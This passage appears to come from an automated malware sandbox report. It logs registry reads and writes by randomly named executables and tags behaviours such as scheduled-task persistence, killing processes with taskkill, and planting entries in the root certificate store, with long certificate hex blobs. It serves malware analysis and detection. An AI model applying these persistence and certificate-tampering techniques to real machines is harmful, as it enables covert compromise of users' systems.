Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\servicing\TrustedInstaller.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\shZ2QlXdkmTmsk4zR41gLVc7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Windows\servicing\TrustedInstaller.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Users\Admin\AppData\Local\Temp\0709047991.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\servicing\TrustedInstaller.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\servicing\TrustedInstaller.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Windows\servicing\TrustedInstaller.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings C:\Windows\servicing\TrustedInstaller.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1b